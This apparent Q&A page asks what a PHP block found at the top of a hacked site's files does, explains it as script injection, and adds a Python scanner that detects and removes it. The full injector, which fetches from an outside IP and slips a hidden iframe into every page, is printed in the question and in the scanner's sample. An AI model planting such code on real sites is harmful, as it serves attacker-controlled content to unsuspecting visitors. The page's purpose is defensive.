
Server Hack - Random Code added to the top of PHP files

I found these lines of code on some .PHP pages of mine.

<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/
// Runs once per request; the constant also serves as an "already infected" sentinel.
if (!defined('HDDD467FFEY322')) {
    // Output-buffer callback: receives the finished page just before it is sent to the browser.
    function _shutdown_function($asd) {
        // Off-screen 1x1 iframe; the URL inside it is swapped out further down.
        $write = <<<AOLEW
<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write("<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>");KDDRTFGEG=true;}</script>
AOLEW;
        // Strip any earlier copy of the payload delimited by the marker comments, so it is not inserted twice.
        $asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd);
        // Fetch whatever the attacker's server currently returns, at request time.
        $sdf = file_get_contents('http://82.200.204.151/config.inc.php');
        // Replace the iframe URL with the fetched value and append the script right before </body>.
        return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);
    }
    // Register the callback so every page this request outputs passes through it.
    if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);
    define('HDDD467FFEY322', 1);
}
/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>

Anyone know anything about it?

Or at least tell me what it is doing...

Update 09 / 11 / 2015

This is called JavaScript injection (XSS¹); it happens when your server is hacked and an infection is spread.

This could, for instance, prompt a download window upon entering the website, causing misled users to download possibly malicious software onto their machines.

To get rid of it, you'd best check all the files you have, scan your entire PC, and maybe do a clean install. There are usually strange <script> tags in the files with some really freaky "makes-no-sense" JS in them; this is a good indication that your files have been injected with JS.

You'll also need to find the leak if you want to get rid of it permanently (or until they find new ways to XSS your site).

Here's another thing you can do to protect yourself against XSS: CSP.


¹ Cross-Site Scripting


Offtopic:

Since I'm revisiting this answer today, 14 years after 9/11 in 2001, I'd like to pay my respects to those who died on that day - RIP.
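The answer says to check every file for the injected code; the block in the question is regular enough to do that mechanically. What follows is an added example, written for this page and not part of the question, the answer or any project's code: a Python scanner that walks a web root, flags PHP files showing the injector's fingerprints (the ob_start() callback named _shutdown_function, a file_get_contents() of a remote URL, an off-screen iframe, the sentinel constant), extracts the remote URL the injector fetches from so it can be blocked and searched for in egress logs, and strips the whole `<?php /*marker*/ ... /*marker*/ ?>` block, keeping a .bak copy. It assumes the block sits at the top of the file in exactly the shape posted above (that assumption is my own), scans only .php/.phtml/.inc files, and the infected file it builds in a temporary directory is a constructed sample. Cleaning files does not close the hole the attacker used; it only removes this payload.

```python
"""Added example: find and strip the ob_start() iframe injector from PHP files.
Assumptions (mine, not from the post): the block is `<?php /*marker*/ ... /*marker*/ ?>`
at the top of the file; the marker is a lowercase alphanumeric token of 32+ chars."""
import os
import re
import shutil
import tempfile

# One regex for the whole injected block. \1 forces both marker comments to be
# identical, and the tempered token (?:(?!/\*\1\*/).)*? keeps the body from
# running past the closing marker into the site's own code.
INJECTOR_RE = re.compile(
    r"<\?php\s*/\*([0-9a-z]{32,})\*/"        # opening tag + marker comment
    r"(?:(?!/\*\1\*/).)*?"                    # body up to the signature call
    r"ob_start\(\s*'_shutdown_function'"      # the injector's callback registration
    r"(?:(?!/\*\1\*/).)*?"                    # rest of the body
    r"/\*\1\*/\s*\?>\s*",                     # closing marker + closing tag
    re.DOTALL,
)
URL_RE = re.compile(r"""https?://[^\s'"()<>]+""")

# Looser fingerprints, reported even when the full block does not match exactly.
INDICATORS = {
    "ob_start_callback": re.compile(r"ob_start\(\s*'_shutdown_function'"),
    "remote_include": re.compile(r"file_get_contents\(\s*'https?://"),
    "offscreen_iframe": re.compile(r"<iframe[^>]*top:-\d+px", re.IGNORECASE),
    "sentinel_constant": re.compile(r"define\('HDDD467FFEY322'"),
}

# Constructed sample: the injector from the question prepended to a harmless page.
SAMPLE_INJECTOR = (
    "<?php /*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/"
    "if (!defined('HDDD467FFEY322')){function _shutdown_function($asd){$write =<<<AOLEW\n"
    "<script type='text/javascript'>if (typeof KDDRTFGEG == 'undefined') {document.write(\"<iframe src='http://82.200.204.151/config.inc.php' style='position:absolute;top:-1000px;left:-1000px;text-indent:-1000;width:1px;height:1px;'></iframe>\");KDDRTFGEG=true;}</script>\n"
    "AOLEW;\n"
    "$asd = preg_replace('/<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->(.*?)<!--d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na-->/i', '', $asd); "
    "$sdf = file_get_contents('http://82.200.204.151/config.inc.php');"
    "return str_replace('</body>', str_replace('http://82.200.204.151/config.inc.php', $sdf, $write) . '</body>', $asd);}"
    "if (function_exists('ob_start') && is_callable('ob_start')) $result = ob_start('_shutdown_function', 0, true);"
    "define('HDDD467FFEY322', 1);}/*d9787ac8b1f855217686293eff4ef53cvf4cet4gsk4k00na*/ ?>\n"
)
ORIGINAL_PAGE = "<?php\n// constructed stand-in for the site's own code\necho '<html><body>Hello</body></html>';\n"


def find_indicators(text):
    """Names of the fingerprints present in `text` (empty list for a clean file)."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]


def extract_c2_urls(text):
    """Remote URLs referenced inside matched injector blocks (block these, grep egress logs)."""
    urls = set()
    for m in INJECTOR_RE.finditer(text):
        urls.update(URL_RE.findall(m.group(0)))
    return sorted(urls)


def clean_text(text):
    """Return (text with every injector block removed, number of blocks removed)."""
    return INJECTOR_RE.subn("", text)


def _read(path):
    # latin-1 round-trips arbitrary bytes, so rewriting never corrupts non-UTF-8 files.
    with open(path, encoding="latin-1") as fh:
        return fh.read()


def scan_tree(root, extensions=(".php", ".phtml", ".inc")):
    """Walk `root`; return {path: [indicators]} for every file showing any fingerprint."""
    hits = {}
    for dirpath, _, filenames in os.walk(root):
        for name in filenames:
            if name.lower().endswith(extensions):
                path = os.path.join(dirpath, name)
                found = find_indicators(_read(path))
                if found:
                    hits[path] = found
    return hits


def clean_tree(root, dry_run=True):
    """Strip the block from flagged files. Returns {path: blocks_removed}. Files that
    show fingerprints but no complete block are left for manual review."""
    changed = {}
    for path in scan_tree(root):
        cleaned, n = clean_text(_read(path))
        if n == 0:
            continue
        changed[path] = n
        if not dry_run:
            shutil.copy2(path, path + ".bak")   # keep the infected original for forensics
            with open(path, "w", encoding="latin-1") as fh:
                fh.write(cleaned)
    return changed


def demo():
    """Infect a temp tree with the constructed sample, scan, clean, and report."""
    with tempfile.TemporaryDirectory() as root:
        infected = os.path.join(root, "index.php")
        with open(infected, "w", encoding="latin-1") as fh:
            fh.write(SAMPLE_INJECTOR + ORIGINAL_PAGE)
        with open(os.path.join(root, "clean.php"), "w", encoding="latin-1") as fh:
            fh.write(ORIGINAL_PAGE)
        before = scan_tree(root)[infected]
        urls = extract_c2_urls(_read(infected))
        removed = clean_tree(root, dry_run=False)[infected]
        restored = _read(infected) == ORIGINAL_PAGE
        return before, urls, removed, restored, len(scan_tree(root))


if __name__ == "__main__":
    print(demo())
```

Run `clean_tree(webroot)` first with the default dry_run=True and review the list; files that show fingerprints but no complete block are reported by scan_tree and not rewritten, because a variant of the injector may not start at the top of the file. The fetched URL is the more useful indicator than the file contents: the injector pulls its payload from that host on every request, so the web server's outbound connections to it show up in firewall or proxy logs and date the infection.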

The technical post webpages of this site follow the CC BY-SA 4.0 protocol. If you need to reprint, please indicate the site URL or the original address. Any question please contact: yoyou2525@163.com.

粤ICP备18138465号  © 2020-2024 STACKOOM.COM